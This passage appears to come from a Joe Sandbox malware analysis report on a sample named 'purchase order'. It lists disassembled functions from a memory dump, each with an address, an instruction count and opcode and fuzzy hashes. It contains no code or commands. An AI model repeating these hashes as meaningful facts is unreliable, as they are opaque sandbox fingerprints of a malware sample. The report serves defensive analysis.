                                                                                                              • Instruction ID: 196e9ee16038050cf2e6005aabeccfdbcf27b221bef2d45f638dac4c5ceb6d9c
                                                                                                              • Opcode Fuzzy Hash: 1b3a80a33ec105bf31bdfaf541f95d741987241ee1e6569f894d1be15b1aa2b0
                                                                                                              • Instruction Fuzzy Hash: B51179B1A083099FC700DF69D84695FBBE4FF99310F00491AB998DB391E730E900CB92
                                                                                                              Function 015ECA11 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 01d42fa91a13bbad4f8349d5f08d81267649182c246bed3a9967617260380968
                                                                                                              • Instruction ID: 44aae09ba1a3d8c31888122647dd0f563994591cdbeeebfbd96d2e662741f12c
                                                                                                              • Opcode Fuzzy Hash: 01d42fa91a13bbad4f8349d5f08d81267649182c246bed3a9967617260380968
                                                                                                              • Instruction Fuzzy Hash: C01179B2A083099FC310DF69D84594FBBE4FF99350F00891AB958DB3A0E670E900CB92
                                                                                                              Function 01634A80 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction ID: 41a8d5193b7b1406c38358c1d083bbc70184e0b1031e3ea1833c169f71a3a587
                                                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction Fuzzy Hash: CB01D4322046069FD7219A6DDC44F96FBEAFFC6210F084819EA428B754DFB0F842C794
                                                                                                              Function 0157E016 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: 61e787461d82907443fa94f293a3553c81a46a7c2a2756e92cda2e5959586e1d
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction Fuzzy Hash: 75017C722016809FE327861DD94AF6A7BE8FB86758F0904A5FA05CF6A1D668DC40C621
                                                                                                              Function 0155826B Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: acfff76bc57d264bbd32a54896b24cc106ebf40a7ca5294426bb4a960df26e22
                                                                                                              • Instruction ID: 287371de8d0e54815e3ba3fa9be689ed4ec5c7859bca899028b183bf6a404ebf
                                                                                                              • Opcode Fuzzy Hash: acfff76bc57d264bbd32a54896b24cc106ebf40a7ca5294426bb4a960df26e22
                                                                                                              • Instruction Fuzzy Hash: BA01D431B00A06DFD714DB6ADC549AE7BE9FF84690F09406A9D01AF644EE70D901C691
                                                                                                              Function 0160EB50 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 073a057ac1c55bf5e860671aa43ebe23255f8f813c5e94718ae1c1a6b82621ca
                                                                                                              • Instruction ID: 12bb39112c0a2a7ea6a5e8f2559ef366b6d1343ce55c0a8a3aa229e3c7c10dac
                                                                                                              • Opcode Fuzzy Hash: 073a057ac1c55bf5e860671aa43ebe23255f8f813c5e94718ae1c1a6b82621ca
                                                                                                              • Instruction Fuzzy Hash: 7E01DF71680B12AFD3369E19DD01F13BAA8EF95B90F000C2AE6068F390D7B1D8418B98
                                                                                                              Function 01562582 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa36fd3de60925fa4bf55e4840c4360f8c3cb9cc080c5f1cd9ad99fd617c8f0d
                                                                                                              • Instruction ID: 76d99f78810671cfdd9e6cdb7184bef66135ae967dabc82406fad9d8262803f7
                                                                                                              • Opcode Fuzzy Hash: aa36fd3de60925fa4bf55e4840c4360f8c3cb9cc080c5f1cd9ad99fd617c8f0d
                                                                                                              • Instruction Fuzzy Hash: 7CF08132641A11ABC7319A5A9D40F5BBAADFBD4BA0F154429A60A9F640DA30ED01DBE0
                                                                                                              Function 0158C073 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: 7da957c445b99716acd2897337f217a13b43cda2f65aaa00ec9a8e56a1a09338
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: 71F0C2B2600611AFD324DF4DDC40E5BFBEAEBD1A80F048528A645DB220EA31ED05CB90
                                                                                                              Function 0155C310 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 7f990ca30b7b65e8920c8125467ab8d7381b60743901b7a70c3f9ae4eaa85719
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: DCF0FC332047279BD772175988A0B6FA6DDBFD1B64F1B0037EA059F201C9A58D01A6D1
                                                                                                              Function 0159CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: a3c0066a6868262c2e4b730699e380e2c69cc6b6c5c0958f1f05c7083c4a97be
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: E70181326006869BD732965DD809F5DBBD8FF91764F0944A9FA148F6A1D7B9C800C352
                                                                                                              Function 016361E5 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bfc1081f42bcc1b30b199c1ac88fc35fb313383833fce24f94f799d63a2ee772
                                                                                                              • Instruction ID: c9a5600547693faaabac92d166008d809fe8adca80d23e7312e4d9f13191a18a
                                                                                                              • Opcode Fuzzy Hash: bfc1081f42bcc1b30b199c1ac88fc35fb313383833fce24f94f799d63a2ee772
                                                                                                              • Instruction Fuzzy Hash: D2014471A00249EBDB04DFA9D855ADEBBF4BF54314F144059E505AB380D774EA01CB55
                                                                                                              Function 015E63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: 5393fea9e09729389a221d33af701fc752eca8700612b63e7f646324dfb35841
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: 35F0127210011EBFEF019F94DD81DAF7BBDFF952D8B104125FA1196160D631DD21A7A0
                                                                                                              Function 015EA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17536433319d781127ecc705b0b8debcfca5d098dd39f98be043d93becac6a20
                                                                                                              • Instruction ID: fbbe1860b1f2d2645922c9dbfd2e9767d5ed3811b090ee99f84b5bd5abb5a211
                                                                                                              • Opcode Fuzzy Hash: 17536433319d781127ecc705b0b8debcfca5d098dd39f98be043d93becac6a20
                                                                                                              • Instruction Fuzzy Hash: 0C018936510219ABCF129E94DC44EDE3FA6FB4C754F059105FE196A220C732D970EB91
                                                                                                              Function 0155C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9dee0429986324cd7ea530ed5649155278496aa3887d37c398e610bc236f355c
                                                                                                              • Instruction ID: 6758a5d103920688cba7fa3d9b327497c3928e086974d6dc5e24847533842af0
                                                                                                              • Opcode Fuzzy Hash: 9dee0429986324cd7ea530ed5649155278496aa3887d37c398e610bc236f355c
                                                                                                              • Instruction Fuzzy Hash: 8DF0F0B2A043425BF39496198C22B2233DEF7C4791F25842BEF098F2C1E970D8018394
                                                                                                              Function 0159656A Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4095d4921ee8ee666dfaca272fcfce0af2b55c41f051dc75aa819a0fd68e98b
                                                                                                              • Instruction ID: 19f5ef578384599a1b946e7dfe8047120ee0426197f36176cc166296def8b65b
                                                                                                              • Opcode Fuzzy Hash: e4095d4921ee8ee666dfaca272fcfce0af2b55c41f051dc75aa819a0fd68e98b
                                                                                                              • Instruction Fuzzy Hash: 4D0144716407869BEB329B6CCD4DF2937E4BB40B54F880594BA018FAD6DB78D4418716
                                                                                                              Function 0160437C Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 5ec8b2a682faf3d0fee587a40f1fb78fa52ca13f2edace8fe09b16d9302578f1
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: DBF0893534192347EB7FAA2F9C10B2BA756AFD0950B05692C9755CB7C0DF60D8018790
                                                                                                              Function 015EE872 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: aabe1b8c87a55e4d6929d00783826271232fb6eb1cbfa4e723fd2f0fea1252f1
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 10F0E933F285129BE3358A4DDC86F16B7E8FFD5A60F190064A6049F260C360EC01C7D0
                                                                                                              Function 015EC89D Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b037ff7fb1663f899b16e43d06e69f28d19d8532aa7980f0ace8079d281ad48
                                                                                                              • Instruction ID: 3170dc5df9313c348f8f6f922711cd1cf36ad5f8802f88f4e36bc63d1bfdea1a
                                                                                                              • Opcode Fuzzy Hash: 3b037ff7fb1663f899b16e43d06e69f28d19d8532aa7980f0ace8079d281ad48
                                                                                                              • Instruction Fuzzy Hash: B1F0AF706097059FC314EF68C946A1EBBE4FF98710F80465AB898DF390E634EA00C796
                                                                                                              Function 01590854 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 7d73152834fc782fc155a6cb1f67c3892d6da2cfa93b894b7bd400c2c81a3e23
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 24F0B472610205EFE714DB25CC01F56B6EDFF98740F148878A945DF2A0FAB0DD01C655
                                                                                                              Function 015EC912 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78f83c91d7642e69c9c6bcc4b43f42b2ff4e2e13500cfa6de2d3c658fcfbfa1e
                                                                                                              • Instruction ID: 988da34d37081849353511a8e37526ac80f8cc9dcb9341d1abec52523ca656cf
                                                                                                              • Opcode Fuzzy Hash: 78f83c91d7642e69c9c6bcc4b43f42b2ff4e2e13500cfa6de2d3c658fcfbfa1e
                                                                                                              • Instruction Fuzzy Hash: 69F04F70A0124AEFCB04EFA9D515A5EB7F4FF58300F408055A955EF385DA74EA01CB60
                                                                                                              Function 015647FB Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 019728f512a6bb7f51fa4ec724bee017311c887eef62a66de4c4bfbbde54f6ef
                                                                                                              • Instruction ID: 862e5db3cc98c1b0d7eb7290ddfedd0dacdee9623d0986e384b2c0ef0b5315b0
                                                                                                              • Opcode Fuzzy Hash: 019728f512a6bb7f51fa4ec724bee017311c887eef62a66de4c4bfbbde54f6ef
                                                                                                              • Instruction Fuzzy Hash: 6FF0BE319166E1DFE733CBACC494B69BBDCBB40620F08896AD5898F502CB24D880C6D0
                                                                                                              Function 01620115 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4b0dc0706248db9b9bf7817deec35e195b13fd205f267c151fa935024b363b7
                                                                                                              • Instruction ID: 915c514babd65b08558cea57a4b0b712f158eeeda05e90137f0c14ef159f0cdb
                                                                                                              • Opcode Fuzzy Hash: e4b0dc0706248db9b9bf7817deec35e195b13fd205f267c151fa935024b363b7
                                                                                                              • Instruction Fuzzy Hash: 96F05C67415BE20ACF329B7CFC583D12F75A741114F6D2489E8A05B309C7748493CB64
                                                                                                              Function 0159C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c502775547df5cafbe02f912bb625e51c2aa0ed5142c31aa57210b2bd1fd9f2e
                                                                                                              • Instruction ID: f331279df9e9f8f7406ff4b959c99c91965c2656b121750acdca6ffe7e003228
                                                                                                              • Opcode Fuzzy Hash: c502775547df5cafbe02f912bb625e51c2aa0ed5142c31aa57210b2bd1fd9f2e
                                                                                                              • Instruction Fuzzy Hash: 51F0E2715116519FEF22975CC288B59BBD8FB807A0F089825D406CF552C660E880CBD2
                                                                                                              Function 015A2619 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 7f219e0c4e4b4cc3725bda4bf430ebad3e998fde3409d33d2c29e3a172b999b9
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: 2BE0D8323816022BE7119E598CC1F4B776EFFD2B10F44447DBA045F251CAE2DC0982A4
                                                                                                              Function 015F6030 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 83a5809cb5597cb78dca9d2306ddb9cae9946351269413dee7a5cf3f040f1472
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: 69F058721002049FE3208B09D844B52B7E8FB05364F118829E6088B160D23AAC40CBA0
                                                                                                              Function 01560710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 0a6e4e78ccb939da7e7edec77bf9c8f3238f3334d6a91941b11c5d292c0eeff4
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: E6F0E53A2047419BDB1ACF19D040AD97BE8FB41360F040494F8428F341D735E981CB95
                                                                                                              Function 015949D0 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: a1d226e80fddcd13a9c10d23e0694799a9ece504f8cc903ff1ed1cdc0ee2fc0c
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: EFE0D832254146AFDB211A598900B7A77E7FBD27A0F150829E6009F150DBF8DC42C7D9
                                                                                                              Function 0160678E Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 222bcbdefc416e36e292cbef14724488b340630970ba182b11a7a2276408c5c6
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: D1E0D872600110BFDB229759CD01F9B7EACEB90EA0F050454B601DB1D0E530DE00C690
                                                                                                              Function 015625E0 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d0e9d49a71130ba9be1e83c834f4bb3f666d8a25ac4d002d870ec6c2c275881d
                                                                                                              • Instruction ID: bd22ca940a82ade75c4a32acfd9347a7b93e2dd7afe97ee90a1902595f463835
                                                                                                              • Opcode Fuzzy Hash: d0e9d49a71130ba9be1e83c834f4bb3f666d8a25ac4d002d870ec6c2c275881d
                                                                                                              • Instruction Fuzzy Hash: F1E092321006559BC321FB29DD02F8A779EFFA0364F014515B1555B190CB30AC10C7D4
                                                                                                              Function 0161A456 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: 6a771bca858350a64b47f69a57fe7aa03acb56e1b898da65de02909a87f14305
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 93E09231052692DFE7326F6ADC48B52BAE0FF90711F188C2CA19A166B0C7B498C0DA40
                                                                                                              Function 015E4000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
